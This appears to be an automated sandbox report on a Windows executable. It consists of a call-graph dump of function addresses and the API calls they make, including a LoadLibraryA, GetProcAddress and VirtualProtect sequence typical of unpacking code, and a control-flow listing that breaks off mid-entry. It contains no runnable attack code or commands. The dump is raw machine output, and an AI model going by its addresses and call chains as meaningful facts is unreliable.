7ff7b2b7f526 77460->77461 77632 7ff7b2b7f358 71 API calls _fread_nolock 77461->77632 77463 7ff7b2b7f4fc 77463->77313 77633 7ff7b2b6c850 77464->77633 77467 7ff7b2b636eb GetLastError 77640 7ff7b2b62c50 51 API calls _log10_special 77467->77640 77468 7ff7b2b63710 77635 7ff7b2b69280 FindFirstFileExW 77468->77635 77472 7ff7b2b6377d 77643 7ff7b2b69440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 77472->77643 77473 7ff7b2b63723 77641 7ff7b2b69300 CreateFileW GetFinalPathNameByHandleW CloseHandle 77473->77641 77475 7ff7b2b6c550 _log10_special 8 API calls 77478 7ff7b2b637b5 77475->77478 77477 7ff7b2b6378b 77485 7ff7b2b63706 77477->77485 77644 7ff7b2b62810 49 API calls _log10_special 77477->77644 77478->77394 77486 7ff7b2b61950 77478->77486 77479 7ff7b2b63730 77480 7ff7b2b63734 77479->77480 77481 7ff7b2b6374c __vcrt_InitializeCriticalSectionEx 77479->77481 77642 7ff7b2b62810 49 API calls _log10_special 77480->77642 77481->77472 77484 7ff7b2b63745 77484->77485 77485->77475 77487 7ff7b2b645c0 108 API calls 77486->77487 77488 7ff7b2b61985 77487->77488 77489 7ff7b2b61c43 77488->77489 77491 7ff7b2b67f90 83 API calls 77488->77491 77490 7ff7b2b6c550 _log10_special 8 API calls 77489->77490 77492 7ff7b2b61c5e 77490->77492 77493 7ff7b2b619cb 77491->77493 77492->77320 77492->77321 77535 7ff7b2b61a03 77493->77535 77645 7ff7b2b706d4 77493->77645 77495 7ff7b2b7004c 74 API calls 77495->77489 77496 7ff7b2b619e5 77497 7ff7b2b61a08 77496->77497 77498 7ff7b2b619e9 77496->77498 77649 7ff7b2b7039c 77497->77649 77652 7ff7b2b74f08 11 API calls _get_daylight 77498->77652 77502 7ff7b2b619ee 77653 7ff7b2b62910 54 API calls _log10_special 77502->77653 77504 7ff7b2b61a26 77654 7ff7b2b74f08 11 API calls _get_daylight 77504->77654 77505 7ff7b2b61a45 77509 7ff7b2b61a5c 77505->77509 77510 7ff7b2b61a7b 77505->77510 77507 7ff7b2b61a2b 77655 7ff7b2b62910 54 API calls _log10_special 77507->77655 77656 7ff7b2b74f08 11 API calls _get_daylight 77509->77656 77511 7ff7b2b61c80 49 API calls 77510->77511 77513 7ff7b2b61a92 77511->77513 77516 7ff7b2b61c80 49 API calls 77513->77516 77514 7ff7b2b61a61 77657 7ff7b2b62910 54 API calls _log10_special 77514->77657 77517 7ff7b2b61add 77516->77517 77518 7ff7b2b706d4 73 API calls 77517->77518 77519 7ff7b2b61b01 77518->77519 77520 7ff7b2b61b16 77519->77520 77521 7ff7b2b61b35 77519->77521 77658 7ff7b2b74f08 11 API calls _get_daylight 77520->77658 77522 7ff7b2b7039c _fread_nolock 53 API calls 77521->77522 77524 7ff7b2b61b4a 77522->77524 77526 7ff7b2b61b50 77524->77526 77527 7ff7b2b61b6f 77524->77527 77525 7ff7b2b61b1b 77659 7ff7b2b62910 54 API calls _log10_special 77525->77659 77660 7ff7b2b74f08 11 API calls _get_daylight 77526->77660 77662 7ff7b2b70110 37 API calls 2 library calls 77527->77662 77531 7ff7b2b61b55 77661 7ff7b2b62910 54 API calls _log10_special 77531->77661 77532 7ff7b2b61b89 77532->77535 77663 7ff7b2b62710 54 API calls _log10_special 77532->77663 77535->77495 77537 7ff7b2b6883a 77536->77537 77538 7ff7b2b69390 2 API calls 77537->77538 77539 7ff7b2b68859 GetEnvironmentVariableW 77538->77539 77540 7ff7b2b68876 ExpandEnvironmentStringsW 77539->77540 77541 7ff7b2b688c2 77539->77541 77540->77541 77543 7ff7b2b68898 77540->77543 77542 7ff7b2b6c550 _log10_special 8 API calls 77541->77542 77544 7ff7b2b688d4 77542->77544 77693 7ff7b2b69440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 77543->77693 77544->77328 77546 7ff7b2b688aa 77547 7ff7b2b6c550 _log10_special 8 API calls 77546->77547 77548 7ff7b2b688ba 77547->77548 77548->77328 77550 7ff7b2b693b2 MultiByteToWideChar 77549->77550 77552 7ff7b2b693d6 77549->77552 77551 7ff7b2b693ec __std_exception_destroy 77550->77551 77550->77552 77551->77391 77552->77551 77553 7ff7b2b693f3 MultiByteToWideChar 77552->77553 77553->77551 77694 7ff7b2b66360 77554->77694 77558 7ff7b2b63381 77562 7ff7b2b63399 77558->77562 77762 7ff7b2b66050 77558->77762 77560 7ff7b2b6338d 77560->77562 77771 7ff7b2b661e0 54 API calls 77560->77771 77563 7ff7b2b63670 77562->77563 77564 7ff7b2b6367e 77563->77564 77565 7ff7b2b6368f 77564->77565 77910 7ff7b2b68e60 FreeLibrary 77564->77910 77630 7ff7b2b66fc0 FreeLibrary 77565->77630 77568 7ff7b2b61ca5 77567->77568 77911 7ff7b2b74984 77568->77911 77571->77338 77573 7ff7b2b645cc 77572->77573 77574 7ff7b2b69390 2 API calls 77573->77574 77575 7ff7b2b645f4 77574->77575 77576 7ff7b2b69390 2 API calls 77575->77576 77577 7ff7b2b64607 77576->77577 77938 7ff7b2b75f94 77577->77938 77580 7ff7b2b6c550 _log10_special 8 API calls 77581 7ff7b2b6392b 77580->77581 77581->77327 77582 7ff7b2b67f90 77581->77582 77583 7ff7b2b67fb4 77582->77583 77584 7ff7b2b706d4 73 API calls 77583->77584 77589 7ff7b2b6808b __std_exception_destroy 77583->77589 77585 7ff7b2b67fd0 77584->77585 77585->77589 78106 7ff7b2b778c8 77585->78106 77587 7ff7b2b706d4 73 API calls 77590 7ff7b2b67fe5 77587->77590 77588 7ff7b2b7039c _fread_nolock 53 API calls 77588->77590 77589->77331 77590->77587 77590->77588 77590->77589 77592 7ff7b2b7007c 77591->77592 78122 7ff7b2b6fe28 77592->78122 77594 7ff7b2b70095 77594->77327 77595->77394 77596->77394 77597->77341 77598->77345 77599->77349 77600->77352 77601->77363 77602->77394 77603->77370 77604->77394 77606 7ff7b2b6c559 77605->77606 77607 7ff7b2b63ca7 77606->77607 77608 7ff7b2b6c8e0 IsProcessorFeaturePresent 77606->77608 77607->77450 77609 7ff7b2b6c8f8 77608->77609 78134 7ff7b2b6cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77609->78134 77611 7ff7b2b6c90b 78135 7ff7b2b6c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 77611->78135 77614->77383 77615->77394 77616->77369 77618 7ff7b2b61c80 49 API calls 77617->77618 77619 7ff7b2b64660 77618->77619 77619->77388 77620->77422 77621->77425 77622->77428 77623->77433 77624->77440 77625->77432 77626->77437 77627->77437 77628->77402 77630->77419 77631->77463 77632->77463 77634 7ff7b2b636bc GetModuleFileNameW 77633->77634 77634->77467 77634->77468 77636 7ff7b2b692d2 77635->77636 77637 7ff7b2b692bf FindClose 77635->77637 77638 7ff7b2b6c550 _log10_special 8 API calls 77636->77638 77637->77636 77639 7ff7b2b6371a 77638->77639 77639->77472 77639->77473 77640->77485 77641->77479 77642->77484 77643->77477 77644->77485 77646 7ff7b2b70704 77645->77646 77664 7ff7b2b70464 77646->77664 77648 7ff7b2b7071d 77648->77496 77677 7ff7b2b703bc 77649->77677 77652->77502 77653->77535 77654->77507 77655->77535 77656->77514 77657->77535 77658->77525 77659->77535 77660->77531 77661->77535 77662->77532 77663->77535 77665 7ff7b2b704ce 77664->77665 77666 7ff7b2b7048e 77664->77666 77665->77666 77667 7ff7b2b704da 77665->77667 77676 7ff7b2b7a814 37 API calls 2 library calls 77666->77676 77675 7ff7b2b7546c EnterCriticalSection 77667->77675 77669 7ff7b2b704b5 77669->77648 77671 7ff7b2b704df 77672 7ff7b2b705e8 71 API calls 77671->77672 77673 7ff7b2b704f1 77672->77673 77674 7ff7b2b75478 _fread_nolock LeaveCriticalSection 77673->77674 77674->77669 77676->77669 77678 7ff7b2b703e6 77677->77678 77689 7ff7b2b61a20 77677->77689 77679 7ff7b2b703f5 __scrt_get_show_window_mode 77678->77679 77680 7ff7b2b70432 77678->77680 77678->77689 77691 7ff7b2b74f08 11 API calls _get_daylight 77679->77691 77690 7ff7b2b7546c EnterCriticalSection 77680->77690 77683 7ff7b2b7043a 77685 7ff7b2b7013c _fread_nolock 51 API calls 77683->77685 77684 7ff7b2b7040a 77692 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 77684->77692 77687 7ff7b2b70451 77685->77687 77688 7ff7b2b75478 _fread_nolock LeaveCriticalSection 77687->77688 77688->77689 77689->77504 77689->77505 77691->77684 77692->77689 77693->77546 77695 7ff7b2b66375 77694->77695 77696 7ff7b2b61c80 49 API calls 77695->77696 77697 7ff7b2b663b1 77696->77697 77698 7ff7b2b663dd 77697->77698 77699 7ff7b2b663ba 77697->77699 77701 7ff7b2b64630 49 API calls 77698->77701 77782 7ff7b2b62710 54 API calls _log10_special 77699->77782 77702 7ff7b2b663f5 77701->77702 77703 7ff7b2b66413 77702->77703 77783 7ff7b2b62710 54 API calls _log10_special 77702->77783 77772 7ff7b2b64560 77703->77772 77706 7ff7b2b6c550 _log10_special 8 API calls 77707 7ff7b2b6336e 77706->77707 77707->77562 77725 7ff7b2b66500 77707->77725 77709 7ff7b2b6642b 77711 7ff7b2b64630 49 API calls 77709->77711 77710 7ff7b2b68e80 3 API calls 77710->77709 77712 7ff7b2b66444 77711->77712 77713 7ff7b2b66469 77712->77713 77714 7ff7b2b66449 77712->77714 77778 7ff7b2b68e80 77713->77778 77784 7ff7b2b62710 54 API calls _log10_special 77714->77784 77717 7ff7b2b66476 77718 7ff7b2b66482 77717->77718 77719 7ff7b2b664c1 77717->77719 77720 7ff7b2b69390 2 API calls 77718->77720 77786 7ff7b2b65830 137 API calls 77719->77786 77722 7ff7b2b6649a GetLastError 77720->77722 77785 7ff7b2b62c50 51 API calls _log10_special 77722->77785 77724 7ff7b2b663d3 77724->77706 77787 7ff7b2b65400 77725->77787 77727 7ff7b2b66526 77728 7ff7b2b6652e 77727->77728 77729 7ff7b2b6653f 77727->77729 77812 7ff7b2b62710 54 API calls _log10_special 77728->77812 77794 7ff7b2b64c90 77729->77794 77733 7ff7b2b6655c 77737 7ff7b2b6656c 77733->77737 77739 7ff7b2b6657d 77733->77739 77734 7ff7b2b6654b 77813 7ff7b2b62710 54 API calls _log10_special 77734->77813 77736 7ff7b2b6653a 77736->77558 77814 7ff7b2b62710 54 API calls _log10_special 77737->77814 77740 7ff7b2b6659c 77739->77740 77741 7ff7b2b665ad 77739->77741 77815 7ff7b2b62710 54 API calls _log10_special 77740->77815 77743 7ff7b2b665bc 77741->77743 77744 7ff7b2b665cd 77741->77744 77816 7ff7b2b62710 54 API calls _log10_special 77743->77816 77798 7ff7b2b64d50 77744->77798 77748 7ff7b2b665dc 77817 7ff7b2b62710 54 API calls _log10_special 77748->77817 77749 7ff7b2b665ed 77751 7ff7b2b665fc 77749->77751 77752 7ff7b2b6660d 77749->77752 77818 7ff7b2b62710 54 API calls _log10_special 77751->77818 77754 7ff7b2b6661f 77752->77754 77757 7ff7b2b66630 77752->77757 77819 7ff7b2b62710 54 API calls _log10_special 77754->77819 77756 7ff7b2b6665a 77756->77736 77822 7ff7b2b62710 54 API calls _log10_special 77756->77822 77757->77756 77820 7ff7b2b772b0 73 API calls 77757->77820 77759 7ff7b2b66648 77821 7ff7b2b772b0 73 API calls 77759->77821 77763 7ff7b2b66070 77762->77763 77763->77763 77764 7ff7b2b66099 77763->77764 77770 7ff7b2b660b0 __std_exception_destroy 77763->77770 77854 7ff7b2b62710 54 API calls _log10_special 77764->77854 77766 7ff7b2b660a5 77766->77560 77767 7ff7b2b661bb 77767->77560 77769 7ff7b2b62710 54 API calls 77769->77770 77770->77767 77770->77769 77824 7ff7b2b61470 77770->77824 77771->77562 77773 7ff7b2b6456a 77772->77773 77774 7ff7b2b69390 2 API calls 77773->77774 77775 7ff7b2b6458f 77774->77775 77776 7ff7b2b6c550 _log10_special 8 API calls 77775->77776 77777 7ff7b2b645b7 77776->77777 77777->77709 77777->77710 77779 7ff7b2b69390 2 API calls 77778->77779 77780 7ff7b2b68e94 LoadLibraryExW 77779->77780 77781 7ff7b2b68eb3 __std_exception_destroy 77780->77781 77781->77717 77782->77724 77783->77703 77784->77724 77785->77724 77786->77724 77789 7ff7b2b6542c 77787->77789 77788 7ff7b2b65434 77788->77727 77789->77788 77792 7ff7b2b655d4 77789->77792 77823 7ff7b2b76aa4 48 API calls 77789->77823 77790 7ff7b2b65797 __std_exception_destroy 77790->77727 77791 7ff7b2b647d0 47 API calls 77791->77792 77792->77790 77792->77791 77795 7ff7b2b64cc0 77794->77795 77796 7ff7b2b6c550 _log10_special 8 API calls 77795->77796 77797 7ff7b2b64d2a 77796->77797 77797->77733 77797->77734 77799 7ff7b2b64d65 77798->77799 77800 7ff7b2b61c80 49 API calls 77799->77800 77801 7ff7b2b64db1 77800->77801 77802 7ff7b2b61c80 49 API calls 77801->77802 77811 7ff7b2b64e33 __std_exception_destroy 77801->77811 77803 7ff7b2b64df0 77802->77803 77806 7ff7b2b69390 2 API calls 77803->77806 77803->77811 77804 7ff7b2b6c550 _log10_special 8 API calls 77805 7ff7b2b64e7e 77804->77805 77805->77748 77805->77749 77807 7ff7b2b64e06 77806->77807 77808 7ff7b2b69390 2 API calls 77807->77808 77809 7ff7b2b64e1d 77808->77809 77810 7ff7b2b69390 2 API calls 77809->77810 77810->77811 77811->77804 77812->77736 77813->77736 77814->77736 77815->77736 77816->77736 77817->77736 77818->77736 77819->77736 77820->77759 77821->77756 77822->77736 77823->77789 77825 7ff7b2b645c0 108 API calls 77824->77825 77826 7ff7b2b61493 77825->77826 77827 7ff7b2b614bc 77826->77827 77828 7ff7b2b6149b 77826->77828 77830 7ff7b2b706d4 73 API calls 77827->77830 77877 7ff7b2b62710 54 API calls _log10_special 77828->77877 77832 7ff7b2b614d1 77830->77832 77831 7ff7b2b614ab 77831->77770 77833 7ff7b2b614f8 77832->77833 77834 7ff7b2b614d5 77832->77834 77837 7ff7b2b61508 77833->77837 77838 7ff7b2b61532 77833->77838 77878 7ff7b2b74f08 11 API calls _get_daylight 77834->77878 77836 7ff7b2b614da 77879 7ff7b2b62910 54 API calls _log10_special 77836->77879 77880 7ff7b2b74f08 11 API calls _get_daylight 77837->77880 77841 7ff7b2b61538 77838->77841 77849 7ff7b2b6154b 77838->77849 77855 7ff7b2b61210 77841->77855 77842 7ff7b2b61510 77881 7ff7b2b62910 54 API calls _log10_special 77842->77881 77845 7ff7b2b7004c 74 API calls 77848 7ff7b2b615c4 77845->77848 77846 7ff7b2b614f3 __std_exception_destroy 77846->77845 77847 7ff7b2b7039c _fread_nolock 53 API calls 77847->77849 77848->77770 77849->77846 77849->77847 77850 7ff7b2b615d6 77849->77850 77882 7ff7b2b74f08 11 API calls _get_daylight 77850->77882 77852 7ff7b2b615db 77883 7ff7b2b62910 54 API calls _log10_special 77852->77883 77854->77766 77856 7ff7b2b61268 77855->77856 77857 7ff7b2b61297 77856->77857 77858 7ff7b2b6126f 77856->77858 77861 7ff7b2b612d4 77857->77861 77862 7ff7b2b612b1 77857->77862 77888 7ff7b2b62710 54 API calls _log10_special 77858->77888 77860 7ff7b2b61282 77860->77846 77866 7ff7b2b612e6 77861->77866 77875 7ff7b2b61309 memcpy_s 77861->77875 77889 7ff7b2b74f08 11 API calls _get_daylight 77862->77889 77864 7ff7b2b612b6 77890 7ff7b2b62910 54 API calls _log10_special 77864->77890 77891 7ff7b2b74f08 11 API calls _get_daylight 77866->77891 77868 7ff7b2b7039c _fread_nolock 53 API calls 77868->77875 77869 7ff7b2b612eb 77892 7ff7b2b62910 54 API calls _log10_special 77869->77892 77871 7ff7b2b612cf __std_exception_destroy 77871->77846 77872 7ff7b2b613cf 77893 7ff7b2b62710 54 API calls _log10_special 77872->77893 77875->77868 77875->77871 77875->77872 77876 7ff7b2b70110 37 API calls 77875->77876 77884 7ff7b2b70adc 77875->77884 77876->77875 77877->77831 77878->77836 77879->77846 77880->77842 77881->77846 77882->77852 77883->77846 77885 7ff7b2b70b0c 77884->77885 77894 7ff7b2b7082c 77885->77894 77887 7ff7b2b70b2a 77887->77875 77888->77860 77889->77864 77890->77871 77891->77869 77892->77871 77893->77871 77895 7ff7b2b7084c 77894->77895 77900 7ff7b2b70879 77894->77900 77896 7ff7b2b70856 77895->77896 77897 7ff7b2b70881 77895->77897 77895->77900 77908 7ff7b2b7a814 37 API calls 2 library calls 77896->77908 77901 7ff7b2b7076c 77897->77901 77900->77887 77909 7ff7b2b7546c EnterCriticalSection 77901->77909 77903 7ff7b2b70789 77904 7ff7b2b707ac 74 API calls 77903->77904 77905 7ff7b2b70792 77904->77905 77906 7ff7b2b75478 _fread_nolock LeaveCriticalSection 77905->77906 77907 7ff7b2b7079d 77906->77907 77907->77900 77908->77900 77910->77565 77912 7ff7b2b749de 77911->77912 77913 7ff7b2b74a03 77912->77913 77915 7ff7b2b74a3f 77912->77915 77929 7ff7b2b7a814 37 API calls 2 library calls 77913->77929 77930 7ff7b2b72c10 49 API calls _invalid_parameter_noinfo 77915->77930 77917 7ff7b2b74b1c 77920 7ff7b2b7a948 __free_lconv_num 11 API calls 77917->77920 77918 7ff7b2b74a2d 77919 7ff7b2b6c550 _log10_special 8 API calls 77918->77919 77921 7ff7b2b61cc8 77919->77921 77920->77918 77921->77325 77922 7ff7b2b74ad6 77922->77917 77923 7ff7b2b74af1 77922->77923 77924 7ff7b2b74b40 77922->77924 77927 7ff7b2b74ae8 77922->77927 77931 7ff7b2b7a948 77923->77931 77924->77917 77925 7ff7b2b74b4a 77924->77925 77928 7ff7b2b7a948 __free_lconv_num 11 API calls 77925->77928 77927->77917 77927->77923 77928->77918 77929->77918 77930->77922 77932 7ff7b2b7a94d RtlFreeHeap 77931->77932 77936 7ff7b2b7a97c 77931->77936 77933 7ff7b2b7a968 GetLastError 77932->77933 77932->77936 77934 7ff7b2b7a975 __free_lconv_num 77933->77934 77937 7ff7b2b74f08 11 API calls _get_daylight 77934->77937 77936->77918 77937->77936 77939 7ff7b2b75ec8 77938->77939 77940 7ff7b2b75eee 77939->77940 77943 7ff7b2b75f21 77939->77943 77969 7ff7b2b74f08 11 API calls _get_daylight 77940->77969 77942 7ff7b2b75ef3 77970 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 77942->77970 77944 7ff7b2b75f27 77943->77944 77945 7ff7b2b75f34 77943->77945 77971 7ff7b2b74f08 11 API calls _get_daylight 77944->77971 77957 7ff7b2b7ac28 77945->77957 77949 7ff7b2b64616 77949->77580 77951 7ff7b2b75f48 77972 7ff7b2b74f08 11 API calls _get_daylight 77951->77972 77952 7ff7b2b75f55 77964 7ff7b2b7fecc 77952->77964 77955 7ff7b2b75f68 77973 7ff7b2b75478 LeaveCriticalSection 77955->77973 77974 7ff7b2b802d8 EnterCriticalSection 77957->77974 77959 7ff7b2b7ac3f 77960 7ff7b2b7ac9c 19 API calls 77959->77960 77961 7ff7b2b7ac4a 77960->77961 77962 7ff7b2b80338 _isindst LeaveCriticalSection 77961->77962 77963 7ff7b2b75f3e 77962->77963 77963->77951 77963->77952 77975 7ff7b2b7fbc8 77964->77975 77967 7ff7b2b7ff26 77967->77955 77969->77942 77970->77949 77971->77949 77972->77949 77980 7ff7b2b7fc03 __vcrt_InitializeCriticalSectionEx 77975->77980 77977 7ff7b2b7fea1 77994 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 77977->77994 77979 7ff7b2b7fdd3 77979->77967 77987 7ff7b2b86d54 77979->77987 77984 7ff7b2b7fdca 77980->77984 77990 7ff7b2b77a3c 51 API calls 3 library calls 77980->77990 77982 7ff7b2b7fe35 77982->77984 77991 7ff7b2b77a3c 51 API calls 3 library calls 77982->77991 77984->77979 77993 7ff7b2b74f08 11 API calls _get_daylight 77984->77993 77985 7ff7b2b7fe54 77985->77984 77992 7ff7b2b77a3c 51 API calls 3 library calls 77985->77992 77995 7ff7b2b86354 77987->77995 77990->77982 77991->77985 77992->77984 77993->77977 77994->77979 77996 7ff7b2b8636b 77995->77996 77997 7ff7b2b86389 77995->77997 78049 7ff7b2b74f08 11 API calls _get_daylight 77996->78049 77997->77996 77999 7ff7b2b863a5 77997->77999 78006 7ff7b2b86964 77999->78006 78000 7ff7b2b86370 78050 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78000->78050 78004 7ff7b2b8637c 78004->77967 78052 7ff7b2b86698 78006->78052 78009 7ff7b2b869d9 78084 7ff7b2b74ee8 11 API calls _get_daylight 78009->78084 78010 7ff7b2b869f1 78072 7ff7b2b78520 78010->78072 78021 7ff7b2b863d0 78021->78004 78051 7ff7b2b784f8 LeaveCriticalSection 78021->78051 78029 7ff7b2b869de 78085 7ff7b2b74f08 11 API calls _get_daylight 78029->78085 78049->78000 78050->78004 78053 7ff7b2b866c4 78052->78053 78054 7ff7b2b866de 78052->78054 78053->78054 78097 7ff7b2b74f08 11 API calls _get_daylight 78053->78097 78058 7ff7b2b8675c 78054->78058 78099 7ff7b2b74f08 11 API calls _get_daylight 78054->78099 78056 7ff7b2b866d3 78098 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78056->78098 78059 7ff7b2b867ad 78058->78059 78101 7ff7b2b74f08 11 API calls _get_daylight 78058->78101 78069 7ff7b2b8680a 78059->78069 78103 7ff7b2b79b78 37 API calls 2 library calls 78059->78103 78062 7ff7b2b86806 78065 7ff7b2b86888 78062->78065 78062->78069 78064 7ff7b2b867a2 78102 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78064->78102 78104 7ff7b2b7a900 17 API calls _isindst 78065->78104 78066 7ff7b2b86751 78100 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78066->78100 78069->78009 78069->78010 78105 7ff7b2b802d8 EnterCriticalSection 78072->78105 78084->78029 78085->78021 78097->78056 78098->78054 78099->78066 78100->78058 78101->78064 78102->78059 78103->78062 78107 7ff7b2b778f8 78106->78107 78110 7ff7b2b773d4 78107->78110 78109 7ff7b2b77911 78109->77590 78111 7ff7b2b7741e 78110->78111 78112 7ff7b2b773ef 78110->78112 78120 7ff7b2b7546c EnterCriticalSection 78111->78120 78121 7ff7b2b7a814 37 API calls 2 library calls 78112->78121 78115 7ff7b2b77423 78117 7ff7b2b77440 38 API calls 78115->78117 78116 7ff7b2b7740f 78116->78109 78118 7ff7b2b7742f 78117->78118 78119 7ff7b2b75478 _fread_nolock LeaveCriticalSection 78118->78119 78119->78116 78121->78116 78123 7ff7b2b6fe43 78122->78123 78124 7ff7b2b6fe71 78122->78124 78133 7ff7b2b7a814 37 API calls 2 library calls 78123->78133 78125 7ff7b2b6fe63 78124->78125 78132 7ff7b2b7546c EnterCriticalSection 78124->78132 78125->77594 78128 7ff7b2b6fe88 78129 7ff7b2b6fea4 72 API calls 78128->78129 78130 7ff7b2b6fe94 78129->78130 78131 7ff7b2b75478 _fread_nolock LeaveCriticalSection 78130->78131 78131->78125 78133->78125 78134->77611 78136 7ffd94064460 78137 7ffd94065056 78136->78137 78140 7ffd94064478 78136->78140 78138 7ffd94064f63 LoadLibraryA 78139 7ffd94064f7d 78138->78139 78139->78140 78143 7ffd94064f9c GetProcAddress 78139->78143 78140->78138 78142 7ffd94064fbe VirtualProtect VirtualProtect 78140->78142 78142->78137 78143->78139 78144 7ffd94064fb3 78143->78144 78145 7ff7b2b75628 78146 7ff7b2b75642 78145->78146 78147 7ff7b2b7565f 78145->78147 78170 7ff7b2b74ee8 11 API calls _get_daylight 78146->78170 78147->78146 78148 7ff7b2b75672 CreateFileW 78147->78148 78150 7ff7b2b756dc 78148->78150 78151 7ff7b2b756a6 78148->78151 78174 7ff7b2b75c04 46 API calls 3 library calls 78150->78174 78173 7ff7b2b7577c 59 API calls 3 library calls 78151->78173 78152 7ff7b2b75647 78171 7ff7b2b74f08 11 API calls _get_daylight 78152->78171 78156 7ff7b2b756b4 78159 7ff7b2b756bb CloseHandle 78156->78159 78160 7ff7b2b756d1 CloseHandle 78156->78160 78157 7ff7b2b756e1 78161 7ff7b2b756e5 78157->78161 78162 7ff7b2b75710 78157->78162 78158 7ff7b2b7564f 78172 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 78158->78172 78164 7ff7b2b7565a 78159->78164 78160->78164 78175 7ff7b2b74e7c 11 API calls 2 library calls 78161->78175 78176 7ff7b2b759c4 51 API calls 78162->78176 78167 7ff7b2b7571d 78177 7ff7b2b75b00 21 API calls _fread_nolock 78167->78177 78169 7ff7b2b756ef 78169->78164 78170->78152 78171->78158 78172->78164 78173->78156 78174->78157 78175->78169 78176->78167 78177->78169 78178 7ffd93d12fb8 78179 7ffd93eac6b0 78178->78179 78180 7ffd93eac784 00007FFDB222F020 78179->78180 78181 7ffd93eac6d9 78179->78181 78182 7ff7b2b62fe0 78183 7ff7b2b62ff0 78182->78183 78184 7ff7b2b6302b 78183->78184 78185 7ff7b2b63041 78183->78185 78210 7ff7b2b62710 54 API calls _log10_special 78184->78210 78187 7ff7b2b63061 78185->78187 78198 7ff7b2b63077 __std_exception_destroy 78185->78198 78211 7ff7b2b62710 54 API calls _log10_special 78187->78211 78188 7ff7b2b6c550 _log10_special 8 API calls 78191 7ff7b2b631fa 78188->78191 78190 7ff7b2b63037 __std_exception_destroy 78190->78188 78192 7ff7b2b61470 116 API calls 78192->78198 78193 7ff7b2b63349 78218 7ff7b2b62710 54 API calls _log10_special 78193->78218 78194 7ff7b2b61c80 49 API calls 78194->78198 78196 7ff7b2b63333 78217 7ff7b2b62710 54 API calls _log10_special 78196->78217 78198->78190 78198->78192 78198->78193 78198->78194 78198->78196 78199 7ff7b2b6330d 78198->78199 78201 7ff7b2b63207 78198->78201 78216 7ff7b2b62710 54 API calls _log10_special 78199->78216 78202 7ff7b2b63273 78201->78202 78212 7ff7b2b7a404 37 API calls 2 library calls 78201->78212 78204 7ff7b2b6329e 78202->78204 78205 7ff7b2b63290 78202->78205 78214 7ff7b2b62dd0 37 API calls 78204->78214 78213 7ff7b2b7a404 37 API calls 2 library calls 78205->78213 78208 7ff7b2b6329c 78215 7ff7b2b62500 54 API calls __std_exception_destroy 78208->78215 78210->78190 78211->78190 78212->78202 78213->78208 78214->78208 78215->78190 78216->78190 78217->78190 78218->78190 78219 7ff7b2b79961 78231 7ff7b2b7a3d8 78219->78231 78221 7ff7b2b79966 78222 7ff7b2b7998d GetModuleHandleW 78221->78222 78223 7ff7b2b799d7 78221->78223 78222->78223 78224 7ff7b2b7999a 78222->78224 78225 7ff7b2b79864 11 API calls 78223->78225 78224->78223 78230 7ff7b2b79a88 GetModuleHandleExW GetProcAddress FreeLibrary 78224->78230 78226 7ff7b2b79a13 78225->78226 78227 7ff7b2b79a1a 78226->78227 78228 7ff7b2b79a30 11 API calls 78226->78228 78229 7ff7b2b79a2c 78228->78229 78230->78223 78236 7ff7b2b7b150 45 API calls 3 library calls 78231->78236 78233 7ff7b2b7a3e1 78237 7ff7b2b7a504 45 API calls 2 library calls 78233->78237 78236->78233 78238 7ffd93d16b7c 78239 7ffd93e7a740 78238->78239 78242 7ffd93d12dec GetLastError SetLastError 78239->78242 78241 7ffd93e7a75d 78242->78241

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FF7B2B61000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 7ff7b2b61000-7ff7b2b63806 call 7ff7b2b6fe18 call 7ff7b2b6fe20 call 7ff7b2b6c850 call 7ff7b2b753f0 call 7ff7b2b75484 call 7ff7b2b636b0 14 7ff7b2b63808-7ff7b2b6380f 0->14 15 7ff7b2b63814-7ff7b2b63836 call 7ff7b2b61950 0->15 17 7ff7b2b63c97-7ff7b2b63cb2 call 7ff7b2b6c550 14->17 21 7ff7b2b6383c-7ff7b2b63856 call 7ff7b2b61c80 15->21 22 7ff7b2b6391b-7ff7b2b63931 call 7ff7b2b645c0 15->22 26 7ff7b2b6385b-7ff7b2b6389b call 7ff7b2b68830 21->26 28 7ff7b2b6396a-7ff7b2b6397f call 7ff7b2b62710 22->28 29 7ff7b2b63933-7ff7b2b63960 call 7ff7b2b67f90 22->29 33 7ff7b2b6389d-7ff7b2b638a3 26->33 34 7ff7b2b638c1-7ff7b2b638cc call 7ff7b2b74f30 26->34 42 7ff7b2b63c8f 28->42 40 7ff7b2b63984-7ff7b2b639a6 call 7ff7b2b61c80 29->40 41 7ff7b2b63962-7ff7b2b63965 call 7ff7b2b7004c 29->41 37 7ff7b2b638a5-7ff7b2b638ad 33->37 38 7ff7b2b638af-7ff7b2b638bd call 7ff7b2b689a0 33->38 49 7ff7b2b639fc-7ff7b2b63a2a call 7ff7b2b68940 call 7ff7b2b689a0 * 3 34->49 50 7ff7b2b638d2-7ff7b2b638e1 call 7ff7b2b68830 34->50 37->38 38->34 51 7ff7b2b639b0-7ff7b2b639b9 40->51 41->28 42->17 75 7ff7b2b63a2f-7ff7b2b63a3e call 7ff7b2b68830 49->75 58 7ff7b2b638e7-7ff7b2b638ed 50->58 59 7ff7b2b639f4-7ff7b2b639f7 call 7ff7b2b74f30 50->59 51->51 54 7ff7b2b639bb-7ff7b2b639d8 call 7ff7b2b61950 51->54 54->26 66 7ff7b2b639de-7ff7b2b639ef call 7ff7b2b62710 54->66 64 7ff7b2b638f0-7ff7b2b638fc 58->64 59->49 67 7ff7b2b638fe-7ff7b2b63903 64->67 68 7ff7b2b63905-7ff7b2b63908 64->68 66->42 67->64 67->68 68->59 70 